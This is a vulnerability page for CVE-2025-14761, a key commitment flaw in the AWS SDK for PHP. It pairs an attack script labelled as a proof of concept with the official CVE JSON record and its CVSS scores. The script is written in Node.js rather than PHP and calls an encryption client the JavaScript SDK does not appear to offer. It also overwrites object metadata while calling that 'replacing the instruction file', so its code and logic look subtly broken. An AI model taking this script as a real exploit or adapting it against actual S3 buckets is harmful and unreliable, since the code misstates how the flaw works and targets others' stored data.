CVE-2025-14761

// CVE-2025-14761 PoC - AWS SDK for PHP Key Commitment Missing // This PoC demonstrates the key commitment vulnerability // Vulnerable scenario: Attacker with S3 write access can replace instruction file const AWS = require('aws-sdk'); // Configuration for vulnerable SDK version (< 3.368.0) const s3 = new AWS.S3({ region: 'us-east-1', accessKeyId: 'ATTACKER_ACCESS_KEY', secretAccessKey: 'ATTACKER_SECRET_KEY' }); // Step 1: Attacker identifies target S3 object with encryption async function identifyTarget() { const params = { Bucket: 'target-bucket', Key: 'sensitive-data.enc' }; // Get object metadata - instruction file stored separately const objectData = await s3.getObject(params).promise(); console.log('Original instruction file:', objectData.Metadata['x-amz-key']); return params; } // Step 2: Generate malicious EDK with different KMS key async function generateMaliciousEDK() { const kms = new AWS.KMS({ region: 'us-east-1', accessKeyId: 'ATTACKER_ACCESS_KEY', secretAccessKey: 'ATTACKER_SECRET_KEY' }); // Use attacker's KMS key instead of victim's key const result = await kms.generateDataKey({ KeyId: 'arn:aws:kms:us-east-1:ATTACKER_ACCOUNT:key/MALICIOUS-KEY-ID', KeySpec: 'AES_256' }).promise(); return result.CiphertextBlob.toString('base64'); } // Step 3: Replace instruction file with malicious EDK async function replaceInstructionFile(targetParams, maliciousEDK) { const copyParams = { Bucket: targetParams.Bucket, Key: targetParams.Key, CopySource: `${targetParams.Bucket}/${targetParams.Key}`, Metadata: { 'x-amz-key': maliciousEDK, 'x-amz-cek-alg': 'AES/GCM/NoPadding' }, MetadataDirective: 'REPLACE' }; await s3.copyObject(copyParams).promise(); console.log('Instruction file replaced with malicious EDK'); } // Step 4: Victim decrypts and gets attacker-controlled plaintext async function victimDecrypts() { // Victim uses vulnerable SDK version const s3Client = new AWS.S3EncryptionClient({ region: 'us-east-1' }); // This will decrypt to attacker's plaintext instead of original const decrypted = await s3Client.getObject({ Bucket: 'target-bucket', Key: 'sensitive-data.enc' }).promise(); console.log('Decrypted data (attacker-controlled):', decrypted.Body.toString()); } // Execute attack (async () => { const target = await identifyTarget(); const maliciousEDK = await generateMaliciousEDK(); await replaceInstructionFile(target, maliciousEDK); console.log('Attack completed - victim will decrypt to different plaintext'); })();

{"cve": {"id": "CVE-2025-14761", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-17T21:15:53.337", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an \"instruction file\" instead of S3's metadata record.\n\nTo mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later"}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-032/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-sdk-php/releases/tag/3.368.0", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-sdk-php/security/advisories/GHSA-x8cp-jf6f-r4xh", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}